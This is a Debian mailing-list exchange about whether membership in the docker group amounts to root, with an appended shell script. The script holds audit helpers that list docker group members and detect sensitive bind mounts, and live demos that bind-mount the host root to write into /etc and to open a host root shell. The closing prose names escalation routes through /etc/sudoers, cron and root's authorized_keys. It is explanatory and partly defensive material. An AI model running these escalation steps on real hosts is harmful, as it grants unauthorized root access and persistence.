On 1/21/23 12:42, L L wrote:
> The banner at the top of https://wiki.debian.org/Docker says:
>
> "The Docker daemon has setUID root, and by design allows easy access as root to
> the host filesystem. This makes it trivial for a malicious user to read and
> alter sensitive system files, or for a careless user to allow a malicious
> containerized app to do so. Access to Docker commands effectively grants full
> root power."
>
> I'm trying to test this. I put my own user account in the docker group (and can
> execute docker commands with it).
>
> Then I tried to see if I can use Docker to write a file to a root-owned
> directory without using sudo or su. I used these commands:
>
>     docker run -dit debian /bin/bash                       # start a container
>     docker cp /home/me/some-file container-id:/some-file   # put a file into the container
>     docker cp container-id:/some-file /etc/some-file       # copy the file from the container
>                                                            # into somewhere I shouldn't be able to write to
>
> I got:
>
>     open /etc/some-file: permission denied
>
> Is the wiki out of date and it's completely safe to have user accounts in the
> docker group?
> Is the wiki correct but I'm exploiting group membership wrong?
I would try something like

    docker run -v /:/host -it debian

which I expect would give you root access to the "host" system inside the container, under /host.
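An added example, written for this page and not part of either message above, that carries the bind-mount approach through and adds the two checks a practitioner would want: who is in the docker group, and whether a given `docker run` command line bind-mounts a sensitive host path. It assumes a Debian host with the docker CLI installed, the calling user in the docker group, and the image name `debian`; the target path `/etc/docker-group-demo` and the list of sensitive host paths inside `mounts_host_root` are illustrative choices, not anything from the thread. The reason the poster's `docker cp` attempt failed is that the host-side write of `docker cp` is done by the CLI process as the invoking user, whereas a `-v` bind mount is set up by the daemon as root, so a process inside the container (uid 0 by default) reads and writes the host filesystem with root authority.

```shell
#!/bin/sh
# Added example, not from the original thread.
# Assumptions: docker CLI installed, calling user in the docker group,
# image "debian" pullable. Paths used in the demo are illustrative.

# Audit helper: given group-database lines on stdin (e.g. `getent group`),
# print the members of the docker group, i.e. the accounts that hold
# effective root on this host through the daemon.
docker_group_members() {
    awk -F: '$1 == "docker" {
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
    }'
}

# Policy helper: return 0 when a `docker run` argument list bind-mounts the
# host root or another sensitive host path (illustrative list) into the
# container. Understands "-v SRC:DST[:opts]", "--volume=SRC:DST",
# "--mount type=bind,source=SRC,..." and "--mount=...".
mounts_host_root() {
    prev=""
    for arg in "$@"; do
        src=""
        case "$prev" in
            -v|--volume)
                src="${arg%%:*}" ;;
            --mount)
                src=$(printf '%s' "$arg" | tr ',' '\n' | sed -n -e 's/^source=//p' -e 's/^src=//p') ;;
            *)
                case "$arg" in
                    --volume=*) src="${arg#--volume=}"; src="${src%%:*}" ;;
                    --mount=*)  src=$(printf '%s' "${arg#--mount=}" | tr ',' '\n' | sed -n -e 's/^source=//p' -e 's/^src=//p') ;;
                esac ;;
        esac
        prev="$arg"
        case "$src" in
            /|/etc|/etc/*|/root|/root/*|/var/run/docker.sock) return 0 ;;
        esac
    done
    return 1
}

# Demonstration: the daemon performs the bind mount as root, so the
# container's uid 0 can create a root-owned file under the host's /etc.
# This is the write that `docker cp` to /etc could not do, because the
# CLI writes the host side of a `docker cp` as the invoking user.
write_to_host_etc() {
    target="${1:-/etc/docker-group-demo}"   # illustrative path
    docker run --rm -v /:/host debian \
        sh -c "echo 'written by uid 0 in a container' > /host$target && ls -l /host$target"
}

# Interactive variant: a root shell whose filesystem view is the host's.
host_root_shell() {
    docker run --rm -it -v /:/host debian chroot /host /bin/bash
}

# Only run the live demo when invoked as `sh this.sh demo`, so the file can
# be sourced for its helpers without touching the host.
if [ "${1:-}" = "demo" ]; then
    echo "accounts with root-equivalent access via the docker group:"
    getent group docker | docker_group_members
    write_to_host_etc
fi
```

What the mount gives you is root over the host filesystem rather than the host's full process view, but that is enough: from `/host` you can append to `/etc/sudoers`, drop a cron job or add a key to `/root/.ssh/authorized_keys`, each of which yields a real root shell on the host. Membership in the docker group should therefore be treated exactly as the wiki banner says, as root; rootless Docker (the daemon itself running as an unprivileged user) is the configuration that removes this equivalence.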